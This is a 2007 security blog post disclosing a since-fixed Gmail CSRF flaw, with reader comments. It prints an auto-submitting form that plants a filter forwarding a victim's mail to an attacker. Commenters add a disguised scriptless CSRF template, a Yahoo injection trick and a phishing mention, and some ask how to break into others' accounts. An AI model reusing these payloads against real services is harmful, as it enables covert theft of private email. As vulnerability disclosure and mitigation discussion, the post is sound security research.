Google GMail E-mail Hijack Technique

In this post I am going to show you how someone can remotely install a simple, persistent filter within a GMail account and download all previous as well as snoop onto all future email conversations.

The following sequence of screenshots describes how the attack works.

The victim visits a malicious page while being logged into GMail. Upon that, the page performs a multipart/form-data POST to one of the GMail alternative interfaces and injects a filter into the victim's filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.

The technique used in this example is known as Cross-site request forgery, or simply CSRF. I am not planning to go into details how it works. Just look it up on this blog or with your favourite search engine.

I am not planning to release the details of this vulnerability for now. The exploit was verified by Ryan Naraine and several close friends. It does work and it is nasty if you ask me.

UPDATE 2007/09/28: I promised to release the POC as soon as Google fixes the vulnerability. Well they did. So, here are the details:

<form method="POST" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf" enctype="multipart/form-data"> 
    <input type="hidden" name="cf2_emc" value="true"/> 
    <input type="hidden" name="cf2_email" value="[email protected]"/> 
    <input type="hidden" name="cf1_from" value=""/> 
    <input type="hidden" name="cf1_to" value=""/> 
    <input type="hidden" name="cf1_subj" value=""/> 
    <input type="hidden" name="cf1_has" value=""/> 
    <input type="hidden" name="cf1_hasnot" value=""/> 
    <input type="hidden" name="cf1_attach" value="true"/> 
    <input type="hidden" name="tfi" value=""/> 
    <input type="hidden" name="s" value="z"/> 
    <input type="hidden" name="irf" value="on"/> 
    <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> 
</form> 
<script> 
    document.forms[0].submit();
</script>

The actual exploit can be launched from here. It makes use of a CSRF redirection utility to simplify the process.

Archived Comments

buherator

I think beford was faster: http://blog.beford.org/?p=3

pdp

buherator, this is a different exploit/vulnerability all together...

xen ix

Wow. Checked my Filters right away and gladly I haven't been affected. Keep up the great work.

Anonymous

I'm all for giving the developer time to fix a bug, but why simultaneously disclose without detail? There are plenty of smart people that will use it as information pointing to something that is interesting and will likely also find the bug. Not very useful. If you don't like full public disclosure, say nothing at all until a fix is in place. You do great work and I enjoy reading the technical details of your disclosures and research. I'm not sure this new disclosure experiment is any better than someone saying, "There is a critical bug in IE. Don't use it". Please do keep up the good work even if some of us are critical of your new disclosure policy.

Giorgio Maone

CSRF using POST, right? Can I assume what I'm assuming about mitigation provided by a certain Firefox extension?

troika

i don't know if people realize How Much these bugs can be dangerous. E-mail is a very very personal space,the user trust it. I like G.ogle but, it should slow down a bit. There are too much services/features. The user have no time to fully understand how it works and it's weakness. The Course To Web 2.0 it's becoming very dangerous.

pdp

Giorgio, I thought that NoScript can prevent JavaScript from executing only, but it cannot prevent POST forms to submit if the user clicks on it right? Nevertheless, the attack will be a lot more difficult without JavaScript, unless there is a way to say that the forms should submit when it renders without using any scripting at all.

Giorgio Maone

Petko, NoScript by default prevents every each cross-site POST from untrusted sites as part of its anti-XSS countermeasures which, incidentally, do work as anti-CSRF countermeasures in the best-practice case of POST used for non-idempotent requests, like GMail filters do. So even if you manage to trick user into clicking a submit button (e.g. using clever CSS disguises), the payload will be stripped out :)

pdp

Giorgio, sounds good but doesn't that break things. I mean, CSRF is one of the most fundamental Web characteristic. Disabling it might be ok for people like us, but for the general population, that is a no go! I am not trying to make people more vulnerable. I want for the the extension to succeed. But that wont happen if it breaks pages.

xen ix

@Anonymous: This is what happens if you silently wait for someone to fix a bug. http://bitsex.net/2007/09/norwegian-police-fucks-up/ Is this what you want? What pdp is doing is very honourable. Not only does he warn us, but he keeps a lid on how to do it. If he let people know how to do it, then we would have a bunch of script kiddies probably making a mess. Now those who know and might find out how to do it are so few, so most of us won't notice it, and it will be hopefully fixed within it might get very critical. So again, what do you want? A silent warning or no warning at all?

Giorgio Maone

Petko, this anti-CSRF feature has been in place for six months now (since March, 18th) and nobody complained about it. Consider that by default NoScript filters exclusively cross-site POST requests *from untrusted to trusted* sites, and as such is very unlikely to break anything legitimate. Why should you want an untrusted site to modify the state (that's what POST is for) of a site you trust? At any rate, I repeat: I didn't receive any complaint about it, and many people didn't even notice -- just like you ;)

Anonymous

@xen ix I'm not too interested in the script kiddie effect. Yes, they can cause a severe nuisance. What I am more concerned about are those with equal or greater talents than the public researchers that are tipped off as to where to look. As you say, they are few and most of us won't notice when they succeed. What partial disclosure does is to raise the awareness of those who can exploit a weakness as they WILL know what to look for. I am in the full public disclosure camp, following a reasonable private disclosure timeout to the vendor. While you await a vendor fix in whatever timeline suits you as the discloser, don't tip your hat to the people who have no ethics. pdp does a great service to the community at large. My only gripe is that if there is a public disclosure of any kind, make it full so that mitigations can be researched. If you are working with the vendor and don't want to make a full disclosure because the vendor has not yet fixed the issue, don't publicly disclose at all. When the vendor either fixes the problem or stops working with you, go for full public disclosure.

pdp

Giorgio, that's all cool. However, I've seen many many different setups, especially Intranet ones, that require CSRF to work. In one recent case, the company that I was consulting had to even reduce the security level for the Internet zone, from the domain controller, in order to make their Web app work, since it requires users to be able to open file:// URLs. You call that crazy. I call that crazy, but this is the real world.

Awesome AnDrEw

Another awesome disclosure, pdp. I always enjoy the creative uses you find for vulnerabilities. I don't believe I ever would have thought to combine a filter with a CSRF in order to create a persistent issue within any mail service. Nice work.

Giorgio Maone

Petko, not to be picky, but they need CSR, not CSRF to work :) Anyway, NoScript is very configurable on this side: "NoScript Options|Advanced|XSS|Exceptions"

LiquidBrain

Very interesting... tried and works... Great thinking...

.mario

Very nice find again - and a signal to not underestimate CSRF like usual. @Giorgio: I didn't know about the CSRF protection yet - great thing.

Adrian Pastor

"Nevertheless, the attack will be a lot more difficult without JavaScript, unless there is a way to say that the forms should submit when it renders without using any scripting at all." Guys, Let's remember that even if you don't allow scripting from a certain domain (i.e.: using NoScript), we can still forge a POST request by simply tricking the user to click on a image. I love using the thumbnail of a hot chick for demo purposes. Come on, don't tell me you wouldn't click on it to make the picture bigger! :-D

<html><head></head><body>
Click on the thumbnail to zoom in!<br><br>
<form action="http://mail.google.com/blah/blah.py" method="post">
<input type="text" name="param1" value="whatever1" style="display: none;" />
<input type="text" name="param2" value="whatever2" style="display: none;" />
<input type="image" src="http://somewhere.com/hotchick.jpg" value="Login">
</form></body></html>

I really doubt NoScript can stop the previous code, as we don't use JavaScript. Anyways, this vulnerability is a KILLER and gives me lots of new ideas to poke with webmail services out there.

Giorgio Maone

Adrian, You probably missed my comment http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/#comment-52628 and the discussion which followed. In short, NoScript actually prevents this kind of attack even if the attacker uses a scriptless CSRF vector like yours, and the countermeasure proved to be so much transparent that neither you nor Petko noticed it even if it's there since six months ago ( http://noscript.net/changelog#1.1.4.6.070318 ): cross-site POST requests from untrusted sites are turned into no-data GET.

Frizz

gmail BETA, verry inportant to read the beta thing ;)

hnky

What happens when you delete the filter?

Vincent van den Brink

Nice found! To Google to fix it.

DrByte

Your friend Ryan Naraine disclosed the exploit in his plagiarism of your article and even included links to an EVIL site with the LIVE exploit, so that the unaware could get infected first hand. That's not the kind of education I need... I have requested that he edit the article with no response.

Amanda

I can't say nothing... just... Wow... lol Congrats for your great job!

jumpin joe

How Do We Fix This Vulnerability?

rezn

DrByte: the links in Narrine's blog are to an older, already patched exploit. I don't know why he linked to PoCs for something that is patched. PDP: I just want to say that it is great how you have stepped up the technical content in the blog again, even if I'm not quite in agreement with your (non)disclosure technique. But its your choice, so i won't bother complaining or debating. Anyway, nice job on the recent vulns, including this one.

vsync

Let's remember that even if you don't allow scripting from a certain domain (i.e.: using NoScript), we can still forge a POST request by simply tricking the user to click on a image.

Yes, and that's why various RFCs recommend that servers only take action on POST requests, and that user agents make POST actions visually distinct. Another wise and obvious rule broken by "designers".

Panio Donev

Good job. Only maybe you should have notified google first (and ask for a hefty ransom :-)).

Adrian Pastor

Giorgio Maone, That's actually pretty cool, nice work! I'm a big fan of NoScript btw!

Lizandro Diaz

Com'on GMAIL this is the second time, this happens, enough is enough.

sirdarckcat

yeap, the bug has been fixed, as you can see, the request now has a new field named "at", that has 2 hex-strings separated by a slash, the first one appears to be a session identifier, and the second a counter. Greetz!!

pdp

check above for further details on the vulnerability...

MuyCapaz

Forgive my ignorance, but wouldn't launching every click in a separate virtual machine sandbox go a long way toward a solution? No cross pollination, no problem, right?

hackathology

nice one pdp!!

Adrian Pastor

Is it just me, or is this the security post with the biggest number of trackbacks on the planet? :-D

pdp

MuyCapaz, the sandboxing model will help protecting you box but not your data!!!

thornade

Did someone know if this other bugs has been fixed http://xs-sniper.com/blog/Google-Docs-Cross-Domain-Hole/ It concerns Google Docs & Crossdomain.xml Thorn

SNaRe

I heard that google fixed this problem

alok

this is good but it has some problem like it doesn't describe a lot about hw it hack the email account.... it requires little bit more description

0kn0ck

Good stuff man!.

Romain Wartel

This is the second CSRF affecting GMail recently. Is there any details on how they fixed the two vulnerabilities? Romain.

Ranjkar

That's actually pretty cool, nice work! I'm a big fan of NoScript btw!

MARKY

Salut,

Hacker

Yahoo has similar attack holes in http://omg.yahoo.com/ Attack example http://omg.yahoo.com/happy-birthday-zac/photos/810/6 1. Get yahoo 360 blog ... upload your picture in the blog and select the picture to be shared in settings. 2. Go to above omg.Yahoo.com/something and comment in the box with any evil script type url. Now the example attack im using is with 360. Post: ">YahooHacked');"> This script will replace all others users avatars with your own avatar and you will recive a Yahoo Admin Email and might have your account closed ... Enjoy

brielle

lol...this makes no sense 2 me...it sounds great however does this stuff work 2 catch a cheating spouse???

grawity

came here by browsing archives... is the account in seq1.jpg yours? it looks that the jvyyuie guy is adding all the Wink to his friends.

sexyman

thanks for keeping us up to speed and even moreso for making sure these script kiddies don't figure out how to do it (eventho fixed). keep up the good work!

Rockdrala

You fix the exploit by not opening mail or clicking on any links in mail from people you dont know silly :p This crap is old. Anyone can sploit this. This technique has been out long before Gmail was even a thought. And its one of those things thats always going to be around. Some people use mail server hacks where they can send a email completely from a email like "[email protected]" and have the paypal page in the email but when you click on the link it goes to there cookie sploiting site instead of people or even worse may collect your login information becuase your too silly to look at the url or they have a URL rewrite filter that makes it look like its paypal. The only thing you can do to fight these things. 1. Dont open mail from people you dont know. 2. If the mail is from a potential customer "someone you need to meet through email as a new person" then setup a email address for that flow like [email protected] Makes sure the mail is scanned for virus and spoof checked. 3. Use a smaller email provider. Smaller email service providers can take more care in adding custom SPF records and spam filters in the Mail server for your pop and smtp service that checks headers and makes the mail actually comes from what it says its coming from.

Green Party Guy

Thanks for posting this. A good friend had their account compromised and they wondering why their domain name registrations were stolen from them.

pdp

Green Party Guy, we are aware of the case, though it is very hard to define the method the attacker has used in order to hijack the account in question.

Consumed Consumer

Very informative, esp. the trick for NoScript (kiddies) :)

Nicolae Namolovan

I think CSRF can be easily defeated by checking referer. If your site is not supposed to receive any POST from any 3th party side, then check where POST comes from and block them altogether. Surprised that gmail is not doing this..

pdp

Nicolae, refers can be spoofed, not to mention that you can configure your browser not to send them at all. Therefore, CSRF protection based on refers only is not a solution. The only solution is to implement random tokens per request and store their values within the form you want to check for a CSRF condition. This works and this is what the Google folks tried to do, although their implementation was seriously flawed.

adilah

I would like to hack into my friends account i believe that she is hidding something from me

Rogger

Hey.... I m not understanding what have to do in the filter.... can anyone plz tell me......

rok

but these days mitm is possible though..:d

Johnes I.

I have been locked out of my gmail account. How do I hack back in?

Jay

Wow, lifesavers, you guys totally rock. My problem is that I think I have a total data stream process on me - from gmail, devart, facebook, google searching - everything. May also have got into or are trying to get into my ISP email. My complete digital footprint seems to have been uplifted and is being taunted back to me on various bogus sites found through combining my various identity markers in google searches.

rmadeat

Quote : Wow, lifesavers, you guys totally rock. My problem is that I think I have a total data stream process on me - from gmail, devart, facebook, google searching - everything. May also have got into or are trying to get into my ISP email. My complete digital footprint seems to have been uplifted and is being taunted back to me on various bogus sites found through combining my various identity markers in google searches.

tiesto

Love You Gmail :p

Edward

2 points. 1. the perp could create the filter temporarily then delete it & repeat etc. how would one know it have ever been there? 2. i just discovered gmail messages can be 'deleted forever' so one may never know what emails have been sent/received. this is not a good idea from Gmail. all historic entries should be traceable from the logs.

John Woodz

Was once hacked by watever means i dont know but all contact addresses in my account were being send an email using my gmail account by some hacker perporting to be me.! since am a general mind i stopped using gmail was the best i kuld do i hav no idea about java scripting or watever technical terms u talkn here bt i just wana be safe do i doubt technogy en go stone age !

Janet

wow i didnt know that was possible!

video videolar

Nicolae, refers can be spoofed, not to mention that you can configure your browser not to send them at all. Therefore, CSRF protection based on refers only is not a solution. The only solution is to implement random tokens per request and store their values within the form you want to check for a CSRF condition. This works and this is what the Google folks tried to do, although their implementation was seriously flawed.

Ethical Hacking Forum

Phishing - Phishing is by far the most used and easiest method. The attacker simply sets up a page that looks exactly like the real email login page and tricks people into entering their login information. Update: Check out the new post on how to create your own phishing page here.

Roger

I've been once hacked too, it's rather an unpleasant experience. However Gmail looks fine now, I guess the problem was fixed then. I created a new Google account half a year ago and faced no more similar problems.